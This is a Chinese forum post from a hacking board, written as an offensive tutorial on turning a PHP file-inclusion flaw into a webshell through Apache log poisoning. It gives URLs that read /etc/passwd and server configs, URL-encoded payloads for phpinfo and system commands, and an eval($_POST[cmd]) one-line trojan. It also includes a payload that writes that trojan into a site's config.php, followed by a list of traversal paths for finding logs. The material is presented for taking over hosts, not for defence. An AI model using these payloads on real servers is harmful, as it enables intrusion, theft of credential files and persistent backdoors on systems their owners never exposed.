linux下备份拿shell[渗透必备]

[复制链接]
查看245 | 回复0 | 2012-4-1 19:16:15 | 显示全部楼层 |阅读模式
关于php包含Apache日志的利用,其实也就是利用提交的网址里有php语句,然后再被Apache服务器的日志记录,然后php再去包含执行,从而包含了去执行。当然,这种办法最大的弊端是Apache日志肯定会过大,回应的时候当然会超时什么的,所以也是受条件限制的。全当一种研究算了。下面是我的测试过程,我觉得很有意思,你也看看。

比如说,在一个php存在包含漏洞就像这样,存在一句php包含漏洞的语句
<?include($zizzy);?>//包含变量$zizzy
你可以

http://xxx.com/z.php?zizzy=/etc/inetd.conf

http://xxx.com/z.php?zizzy=/proc/cpuinfo

http://xxx.com/z.php?zizzy=/etc/passwd
就可以利用包含语句来查看一些系统环境和密码档文件。
那么关于日志包含下面我们来看:

比如我们的Apache的服务器配置文件位置在这里

/usr/local/apache/conf/httpd.conf

那么我们来包含一下httpd.conf,来看下路径信息什么的

http://xxx.com/z.php?zizzy=/usr/local/apache/conf/httpd.conf
读出Apache的配置信息,这里列出部分信息。

<VirtualHost218.63.89.2>

User#3

Groupsilver

ServerAdminwebmaster@xxx.com

DocumentRoot/home/virtual/www.xxx.com

ServerNamewww.xxx.com

ServerAliasxxx.com

ErrorLog/home/virtual/www.xxx.com/logs/www-error_log

CustomLog/home/virtual/www.xxx.com/logs/www-access_logcommon

ScriptAlias/cgi-bin//home/virtual/www.xxx.com/cgi-bin/

Alias/icons//home/virtual/www.xxx.com/icons

</VirtualHost>
而我们提交http://xxx.com/z.php?zizzy=/home.../logs/www-error_log

就可以读出Apache的错误日志记录
[MonJan2214:01:162005][error][client218.63.194.76]Filedoesnot

exist:/home/virtual/www.xxx.com/hack.php

[TusJan2219:36:542005][error][client218.63.148.38]Filedoesnot

exist:/home/virtual/www.xxx.com/111111111.php

[WenJan2305:14:542005][error][client218.63.235.129]Filedoesnot

exist:/home/virtual/www.xxx.com/22222.php3

[WenJan2316:25:042005][error][client218.63.232.73]attempttoinvoke

directoryasscript:/home/virtual/www.xxx.com/forum

[FirJan2619:43:452005][error][client218.63.232.73]attempttoinvoke

directoryasscript:/home/virtual/www.xxx.com/blog

[FirJan2619:43:462005][error][client64.229.232.73]attempttoinvoke

directoryasscript:/home/virtual/www.xxx.com/kkkkkkkk
而数据日志/home/virtual/www.xxx.com/logs/www-access_log也是一样的,一样可以读出来,只不过文件会很大,那也没意思测试下去了,那怎么利用呢。
比如我们提交要提交这句,<?phpinfo();?>//查看php的相关信息

在这里,我们只能提交URL编码模式,因为我在测试中发现,<?的标记并不被记录,只有转换成URL编码提交才会被完整记录。
在这里%3C%3Fphpinfo%28%29%3B%3F%3E这句就是转换过了的<?phpinfo();?>,我们提交

http://www.xxx.com/%3C%3Fphpinfo%28%29%3B%3F%3E
这样肯定会报出错找不到页面,而一出错就被记在错误日志里了

http://xxx.com/z.php?zizzy=/home.../logs/www-error_log

这样这个日志文件就被包含成了phpinfo的信息,而回显也就成了一个显示php信息的页面。
如果可以的话(能够执行系统命令,也就是safe_mode开着的时候),

这样子也不错,

<?system(&quot;ls+-la+/home&quot;);?>//执行命令列出home下的文件列表,记得转换为URL格式哦。
/home/

total9

-rw-r--r--1www.xxx.comsilver55Jan2023:01about.php

drwxrwxrwx4www.xxx.comsilver4096Jan2106:07abc

-rw-r--r--1www.xxx.comsilver1438Dec307:39index.php

-rwxrwxrwx1www.xxx.comsilver5709Jan2120:05show.php

-rw-r--r--1www.xxx.comsilver5936Jan1801:37admin.php

-rwxrwxrwx1www.xxx.comsilver5183Jan1815:30config.php3

-rw-rw-rw-1www.xxx.comsilver102229Jan2123:18info.txt

drwxr-xr-x2www.xxx.comsilver4096Jan816:03backup

-rw-r--r--1www.xxx.comsilver7024Dec403:07test.php
这样就列出了home下的文件

或者直接一句话木马<?eval($_POST[cmd]);?>,

这样转换后就是%3C%3Feval%28%24%5FPOST%5Bcmd%5D%29%3B%3F%3E这样的格式。

我们提交

http://www.xxx.com/%3C%3Feval%28%24%5FPOST%5Bcmd%5D%29%3B%3F%3E
再用lanker的一句话木马客户端一连就OK了。
因为上面那个很不实际,我在测试中发现日志动不动就是几十兆,那样玩起来也没意思了。下面想的再深入一点也就是我们写入一个很实际的webshell来用,也比上面那种慢的要死好很多。
比如还是这句一句话木马

<?eval($_POST[cmd]);?>
到这里你也许就想到了,这是个很不错的办法。接着看,如何写入就成了个问题,用这句,

fopen打开/home/virtual/www.xxx.com/forum/config.php这个文件,然后写入<?eval($_POST[cmd]);?>这个一句话木马服务端语句。连起来表达成php语句就是
<?$fp=fopen(&quot;/home/virtual/www.xxx.com/forum/config.php&quot;,&quot;w+&quot;);fputs($fp,&quot;<?eval($_POST[cmd]);?>&quot;);

fclose($fp);?>//在config.php里写入一句木马语句
我们提交这句,再让Apache记录到错误日志里,再包含就成功写入shell,记得一定要转换成URL格式才成功。

转换为

%3C%3F%24fp%3Dfopen%28%22%2Fhome%2Fvirtual%2Fwww%2Exxx%2Ecom%2Fforum%2F

config%2Ephp%22%2C%22w%2B%22%29%3Bfputs%28%24fp

%2C%22%3C%3Feval%28%24%5FPOST%5Bcmd%5D%29%3B%3F%3E%22%29%3B

fclose%28%24fp%29%3B%3F%3E

我们提交

http://xxx.com/%3C%3F%24fp%3Dfopen%28%22%2Fhome%2Fvirtual%2Fwww

%2Exxx%2Ecom%2Fforum%2Fconfig%2Ephp

%22%2C%22w%2B%22%29%3Bfputs%28%24fp%2C%22%3C%3Feval%28%24%5FPOST%5B

cmd%5D%29%3B%3F%3E%22%29%3Bfclose%28%24fp%29%3B%3F%3E
这样就错误日志里就记录下了这行写入webshell的代码。

我们再来包含日志,提交

http://xxx.com/z.php?zizzy=/home.../logs/www-error_log
这样webshell就写入成功了,config.php里就写入一句木马语句

OK.

http://www.xxx.com/forum/config.php这个就成了我们的webshell

直接用lanker的客户端一连,主机就是你的了。
PS:上面讲的,前提是文件夹权限必须可写,一定要-rwxrwxrwx(777)才能继续,这里直接用上面列出的目录来查看。上面讲的都是在知道日志路径的情况下的利用
其他的日志路径,你可以去猜,也可以参照这里。

附:收集的一些日志路径

../../../../../../../../../../var/log/httpd/access_log

../../../../../../../../../../var/log/httpd/error_log

../apache/logs/error.log

../apache/logs/access.log

../../apache/logs/error.log

../../apache/logs/access.log

../../../apache/logs/error.log

../../../apache/logs/access.log

../../../../../../../../../../etc/httpd/logs/acces_log

../../../../../../../../../../etc/httpd/logs/acces.log

../../../../../../../../../../etc/httpd/logs/error_log

../../../../../../../../../../etc/httpd/logs/error.log

../../../../../../../../../../var/www/logs/access_log

../../../../../../../../../../var/www/logs/access.log

../../../../../../../../../../usr/local/apache/logs/access_log

../../../../../../../../../../usr/local/apache/logs/access.log

../../../../../../../../../../var/log/apache/access_log

../../../../../../../../../../var/log/apache/access.log

../../../../../../../../../../var/log/access_log

../../../../../../../../../../var/www/logs/error_log

../../../../../../../../../../var/www/logs/error.log

../../../../../../../../../../usr/local/apache/logs/error_log

../../../../../../../../../../usr/local/apache/logs/error.log

../../../../../../../../../../var/log/apache/error_log

../../../../../../../../../../var/log/apache/error.log

../../../../../../../../../../var/log/access_log

../../../../../../../../../../var/log/error_log

/var/log/httpd/access_log

/var/log/httpd/error_log

../apache/logs/error.log

../apache/logs/access.log

../../apache/logs/error.log

../../apache/logs/access.log

../../../apache/logs/error.log

../../../apache/logs/access.log

/etc/httpd/logs/acces_log

/etc/httpd/logs/acces.log

/etc/httpd/logs/error_log

/etc/httpd/logs/error.log

/var/www/logs/access_log

/var/www/logs/access.log

/usr/local/apache/logs/access_log

/usr/local/apache/logs/access.log

/var/log/apache/access_log

/var/log/apache/access.log

/var/log/access_log

/var/www/logs/error_log

/var/www/logs/error.log

/usr/local/apache/logs/error_log

/usr/local/apache/logs/error.log

/var/log/apache/error_log

/var/log/apache/error.log
*
*
发帖前要善用论坛搜索功能,那里可能会有你要找的答案或者已经有人发布过相同内容了,请勿重复发帖。
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则